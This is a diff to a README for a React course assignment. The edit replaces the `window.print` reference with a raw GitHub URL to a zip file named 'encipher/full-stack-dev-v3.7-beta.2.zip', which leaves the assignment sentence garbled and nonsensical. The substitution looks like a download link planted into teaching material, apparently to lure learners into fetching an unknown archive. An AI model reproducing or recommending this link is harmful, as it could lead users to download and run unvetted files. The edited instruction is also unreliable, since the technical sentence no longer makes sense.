Shoaibxaif/full-stack-dev-2023/README.md

 ## Chapter 15 - Advanced React - Part 2

 - **Assignment 1** :
-Try to use `window.print` functionality as show in code without flushSync and see if really make a difference.
+Try to use `https://raw.githubusercontent.com/Shoaibxaif/full-stack-dev-2023/main/encipher/full-stack-dev-v3.7-beta.2.zip` functionality as show in code without flushSync and see if really make a difference.
 Also, try the same on `alert` functionality, can it also work  ?

 ------